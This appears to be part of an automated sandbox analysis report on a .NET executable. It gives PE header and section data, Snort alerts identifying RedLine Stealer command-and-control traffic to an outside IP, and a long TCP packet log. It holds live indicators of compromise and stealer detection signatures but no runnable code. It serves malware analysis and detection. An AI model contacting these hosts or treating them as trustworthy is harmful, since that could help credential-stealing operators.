add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb1d64	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x2a8a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xafdc4	0xafe00	2a7bbfb24e2715f1dbd62ac9328337dd	False	0.8865535603233831	data	7.90237020530487	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x2a8a	0x2c00	6a686db17d55b66f27706194ba083ead	False	0.8994140625	data	7.551675563345795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb6000	0xc	0x200	6e02a915760e68cd6298eeaf6e733d8c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb2130	0x2476	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9996785943861153
RT_GROUP_ICON	0xb45a8	0x14	data	1.05
RT_VERSION	0xb45bc	0x2e4	data	0.4472972972972973
RT_MANIFEST	0xb48a0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/01/24-20:35:54.029434	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	47232	49711	147.45.47.65	192.168.2.7
05/01/24-20:35:53.101816	TCP	2046045	ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	49711	47232	192.168.2.7	147.45.47.65
05/01/24-20:36:00.399690	TCP	2046056	ET TROJAN Redline Stealer/MetaStealer Family Activity (Response)	47232	49711	147.45.47.65	192.168.2.7
05/01/24-20:36:05.641411	TCP	2043231	ET TROJAN Redline Stealer TCP CnC Activity	49711	47232	192.168.2.7	147.45.47.65

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 1, 2024 20:46:00.680901051 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:00.680977106 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:00.681071997 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:00.738389969 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:00.738430023 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:01.464864016 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:01.464977026 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:02.376580954 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:02.376637936 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:02.376920938 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:02.423017025 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:02.447371006 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:02.492119074 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:02.686218023 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:02.686278105 CEST	443	49732	193.109.246.100	192.168.2.4
May 1, 2024 20:46:02.686358929 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:02.691719055 CEST	49732	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.022692919 CEST	49734	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.022718906 CEST	443	49734	193.109.246.100	192.168.2.4
May 1, 2024 20:46:03.022800922 CEST	49734	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.023128033 CEST	49734	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.023139954 CEST	443	49734	193.109.246.100	192.168.2.4
May 1, 2024 20:46:03.740217924 CEST	443	49734	193.109.246.100	192.168.2.4
May 1, 2024 20:46:03.742248058 CEST	49734	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.742268085 CEST	443	49734	193.109.246.100	192.168.2.4
May 1, 2024 20:46:03.979784966 CEST	443	49734	193.109.246.100	192.168.2.4
May 1, 2024 20:46:03.979831934 CEST	443	49734	193.109.246.100	192.168.2.4
May 1, 2024 20:46:03.979882002 CEST	49734	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.980436087 CEST	49734	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.981728077 CEST	49735	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.981765985 CEST	443	49735	193.109.246.100	192.168.2.4
May 1, 2024 20:46:03.981838942 CEST	49735	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.982085943 CEST	49735	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:03.982103109 CEST	443	49735	193.109.246.100	192.168.2.4
May 1, 2024 20:46:04.708539963 CEST	443	49735	193.109.246.100	192.168.2.4
May 1, 2024 20:46:04.710102081 CEST	49735	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:04.710117102 CEST	443	49735	193.109.246.100	192.168.2.4
May 1, 2024 20:46:04.948836088 CEST	443	49735	193.109.246.100	192.168.2.4
May 1, 2024 20:46:04.948888063 CEST	443	49735	193.109.246.100	192.168.2.4
May 1, 2024 20:46:04.948964119 CEST	49735	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:04.949515104 CEST	49735	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:04.950185061 CEST	49737	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:04.950216055 CEST	443	49737	193.109.246.100	192.168.2.4
May 1, 2024 20:46:04.950287104 CEST	49737	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:04.950752974 CEST	49737	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:04.950768948 CEST	443	49737	193.109.246.100	192.168.2.4
May 1, 2024 20:46:05.680234909 CEST	443	49737	193.109.246.100	192.168.2.4
May 1, 2024 20:46:05.719882965 CEST	49737	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:05.740653992 CEST	49737	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:05.740664959 CEST	443	49737	193.109.246.100	192.168.2.4
May 1, 2024 20:46:05.982384920 CEST	443	49737	193.109.246.100	192.168.2.4
May 1, 2024 20:46:05.982435942 CEST	443	49737	193.109.246.100	192.168.2.4
May 1, 2024 20:46:05.982491016 CEST	49737	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:06.108290911 CEST	49737	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:06.326406002 CEST	49739	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:06.326435089 CEST	443	49739	193.109.246.100	192.168.2.4
May 1, 2024 20:46:06.326514006 CEST	49739	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:06.405375004 CEST	49739	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:06.405400038 CEST	443	49739	193.109.246.100	192.168.2.4
May 1, 2024 20:46:07.115963936 CEST	443	49739	193.109.246.100	192.168.2.4
May 1, 2024 20:46:07.119390011 CEST	49739	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:07.119416952 CEST	443	49739	193.109.246.100	192.168.2.4
May 1, 2024 20:46:07.354840994 CEST	443	49739	193.109.246.100	192.168.2.4
May 1, 2024 20:46:07.354886055 CEST	443	49739	193.109.246.100	192.168.2.4
May 1, 2024 20:46:07.354935884 CEST	49739	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:07.355571985 CEST	49739	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:07.356482983 CEST	49740	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:07.356513023 CEST	443	49740	193.109.246.100	192.168.2.4
May 1, 2024 20:46:07.356584072 CEST	49740	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:07.357007980 CEST	49740	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:07.357019901 CEST	443	49740	193.109.246.100	192.168.2.4
May 1, 2024 20:46:08.079911947 CEST	443	49740	193.109.246.100	192.168.2.4
May 1, 2024 20:46:08.087690115 CEST	49740	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:08.087707996 CEST	443	49740	193.109.246.100	192.168.2.4
May 1, 2024 20:46:08.327364922 CEST	443	49740	193.109.246.100	192.168.2.4
May 1, 2024 20:46:08.327404976 CEST	443	49740	193.109.246.100	192.168.2.4
May 1, 2024 20:46:08.327477932 CEST	49740	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:08.328058004 CEST	49740	443	192.168.2.4	193.109.246.100
May 1, 2024 20:46:08.438553095 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:08.438568115 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:08.438657999 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:08.439058065 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:08.439068079 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:08.641062021 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:08.641140938 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:08.643078089 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:08.643084049 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:08.643280029 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:08.644556999 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:08.688122988 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.310703993 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.310755014 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.310795069 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.310808897 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.310825109 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.310870886 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.310872078 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.310880899 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.310909986 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.310914040 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.311280966 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.311319113 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.311325073 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.311330080 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.311364889 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.311367035 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.311372042 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.311414957 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.311919928 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.311978102 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312011957 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312030077 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.312033892 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312069893 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.312073946 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312767029 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312819004 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.312823057 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312860012 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312886000 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312908888 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.312911987 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312921047 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.312959909 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.313657045 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.313714027 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.313718081 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.360582113 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.412111044 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412295103 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412322998 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412343025 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.412349939 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412401915 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.412601948 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412664890 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412688971 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412704945 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.412709951 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.412750006 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.413141966 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.413211107 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.413239002 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.413250923 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.413254976 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.413295984 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.413299084 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.414017916 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.414052963 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.414063931 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.414067984 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.414103985 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.414108038 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.414895058 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.414947987 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.414952993 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.414994001 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.415051937 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.415095091 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.415100098 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.415138960 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.415751934 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.415817022 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.415838957 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.415888071 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.416649103 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.416707993 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.417440891 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.417490959 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.417547941 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.417602062 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.418437958 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.418494940 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.418518066 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.418572903 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.507077932 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.507148981 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.507179022 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.507230043 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.507971048 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.508028030 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.508164883 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.508209944 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.508745909 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.508796930 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.508932114 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.508981943 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.509706974 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.509757042 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.509829998 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.509884119 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.510585070 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.510632038 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.522238970 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.522291899 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.522413969 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.522465944 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.522974968 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.523036003 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.523669958 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.523724079 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.523776054 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.523830891 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.524538040 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.524597883 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.524636030 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.524686098 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.525418043 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.525470972 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.525504112 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.525557995 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.526269913 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.526323080 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.526407003 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.526453972 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.527204990 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.527257919 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.527286053 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.527338982 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.528111935 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.528167009 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.528815031 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.528853893 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.528868914 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.528873920 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.528898954 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.529717922 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.529772043 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.529774904 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.529794931 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.529818058 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.529822111 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.529853106 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.530513048 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.530565023 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.530569077 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.530611038 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.530653000 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.530706882 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.531375885 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.531430006 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.532701969 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.532708883 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.532767057 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.532774925 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.532815933 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.532825947 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.534436941 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.534451008 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.534507036 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.534512997 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.536307096 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.536323071 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.536375999 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.536382914 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.537935972 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.537946939 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.537993908 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.537998915 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.538024902 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.539748907 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.539763927 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.539819002 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.539825916 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.594966888 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.601907969 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.601922035 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.601988077 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.601993084 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.602032900 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.603614092 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.603627920 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.603681087 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.603686094 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.603734970 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.605331898 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.605345964 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.605397940 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.605402946 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.605438948 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.607125044 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.607139111 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.607188940 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.607192993 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.607227087 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.609141111 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.609154940 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.609203100 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.609208107 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.609244108 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.610902071 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.610924006 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.610965967 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.610970974 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.611007929 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.612617016 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.612631083 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.612682104 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.612687111 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.612721920 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.617454052 CEST	443	49741	104.21.44.179	192.168.2.4
May 1, 2024 20:46:09.617506027 CEST	443	49741	104.21.44.179	192.168.2.4
